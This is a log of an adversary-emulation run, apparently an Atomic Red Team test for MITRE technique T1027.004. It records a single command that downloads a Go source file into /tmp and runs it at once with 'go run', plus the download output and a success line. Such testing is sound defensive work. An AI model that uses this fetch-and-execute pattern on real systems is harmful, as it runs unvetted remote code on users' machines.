[+] Tactic ID   : T1027.004
[+] Technique   : Obfuscated Files or Information: Compile After Delivery - Go compile
[+] Command     :
wget -O /tmp/T1027-004-test.go https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1027.004/src/T1027-004-test.go && go run /tmp/T1027-004-test.go
[+] Success
----- OUTPUT START -----
--2025-08-12 16:11:09--  https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1027.004/src/T1027-004-test.go
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 107 [text/plain]
Saving to: ‘/tmp/T1027-004-test.go’

     0K                                                       100% 19.0M=0s

2025-08-12 16:11:10 (19.0 MB/s) - ‘/tmp/T1027-004-test.go’ saved [107/107]

T1027-004-test.go has compiled and executed
----- OUTPUT END -----
